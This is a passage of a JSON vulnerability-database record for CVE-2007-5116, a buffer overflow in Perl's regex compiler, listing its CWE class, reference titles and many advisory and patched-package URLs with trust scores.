            "url": "https://rhn.redhat.com/errata/RHSA-2007-0966.html"
          },
          {
            "title": "231524",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-231524-1"
          },
          {
            "title": "Patch fixes buffer overflow in regexp compiler",
            "trust": 0.8,
            "url": "http://use.perl.org/article.pl?sid=07/11/29/1432238"
          },
          {
            "title": "Perl 5.8.9 released",
            "trust": 0.8,
            "url": "http://use.perl.org/articles/08/12/16/1129216.shtml"
          },
          {
            "title": "RHSA-2007:0966",
            "trust": 0.8,
            "url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2007-0966J.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-28478"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-5116"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.5,
            "url": "http://www.securityfocus.com/bid/26350"
          },
          {
            "trust": 2.5,
            "url": "http://secunia.com/advisories/27546"
          },
          {
            "trust": 2.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-014.htm"
          },
          {
            "trust": 2.0,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=323571"
          },
          {
            "trust": 1.9,
            "url": "http://www.ipcop.org/index.php?name=news\u0026file=article\u0026sid=41"
          },
          {
            "trust": 1.7,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1iz10220"
          },
          {
            "trust": 1.7,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1iz10244"
          },
          {
            "trust": 1.7,
            "url": "http://lists.apple.com/archives/security-announce/2007/dec/msg00002.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.us-cert.gov/cas/techalerts/ta07-352a.html"
          },
          {
            "trust": 1.7,
            "url": "http://docs.info.apple.com/article.html?artnum=307179"
          },
          {
            "trust": 1.7,
            "url": "http://www.vmware.com/security/advisories/vmsa-2008-0001.html"
          },
          {
            "trust": 1.7,
            "url": "https://issues.rpath.com/browse/rpl-1813"
          },
          {
            "trust": 1.7,
            "url": "http://www.debian.org/security/2007/dsa-1400"
          },
          {
            "trust": 1.7,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200711-28.xml"
          },
          {
            "trust": 1.7,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2007:207"
          },
          {
            "trust": 1.7,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=378131"
          },
          {
            "trust": 1.7,
            "url": "http://lists.vmware.com/pipermail/security-announce/2008/000002.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.openpkg.com/security/advisories/openpkg-sa-2007.023.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.redhat.com/support/errata/rhsa-2007-0966.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.redhat.com/support/errata/rhsa-2007-1011.html"
          },
          {
            "trust": 1.7,
            "url": "http://securitytracker.com/id?1018899"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27479"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27515"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27531"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27548"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27570"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27613"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27756"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27936"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/28167"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/28368"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/28387"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/31208"
          },
          {
            "trust": 1.7,
            "url": "http://www.novell.com/linux/security/advisories/2007_24_sr.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.ubuntu.com/usn/usn-552-1"
          },
          {
            "trust": 1.4,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-231524-1"
          },
          {
            "trust": 1.4,
            "url": "http://xforce.iss.net/xforce/xfdb/38270"
          },
          {
            "trust": 1.4,
            "url": "http://www.frsirt.com/english/advisories/2007/3724"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/483563/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/483584/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/485936/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/486859/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "ftp://aix.software.ibm.com/aix/efixes/security/readme"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10669"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28993"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/29074"
          },
          {
            "trust": 1.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1018985.1-1"
          },
          {
            "trust": 1.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-31524-1"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2007/3724"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2007/4238"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2007/4255"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0064"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0641"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38270"
          },
          {
            "trust": 1.0,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5116"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=120352263023774\u0026w=2"
          },
          {
            "trust": 0.9,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5116"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5116"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/486859/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/485936/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/483584/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/483563/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2007/4255"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2007/4238"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/"
          },
          {
            "trust": 0.3,
            "url": "http://www.perl.com"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=767139#products"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-359.htm"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2007-0966.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2007-1011.html"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3108"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://www.ipcop.org/index.php?name=news\u0026amp;file=article\u0026amp;sid=41"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=120352263023774\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.8-7etch1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.4-8sarge6_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.4-8sarge6_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.8-7etch1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.4-8sarge6_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.8-7etch1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_m68k.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://packages.debian.org/\u003cpkg\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.perl.com/"
          },
          {
            "trust": 0.1,
            "url": "http://openpkg.org/go/package/perl"
          },
          {
            "trust": 0.1,
            "url": "http://openpkg.com/security/signatures/"
          },
          {
            "trust": 0.1,
            "url": "http://openpkg.com/go/openpkg-sa-2007.023"
          },
          {
            "trust": 0.1,
            "url": "http://openpkg.com/\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://openpkg.com/"
          },
          {
            "trust": 0.1,
            "url": "http://openpkg.com/go/openpkg-sa"
          },
          {
            "trust": 0.1,
            "url": "http://openpkg.com/openpkg.com.pgp"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
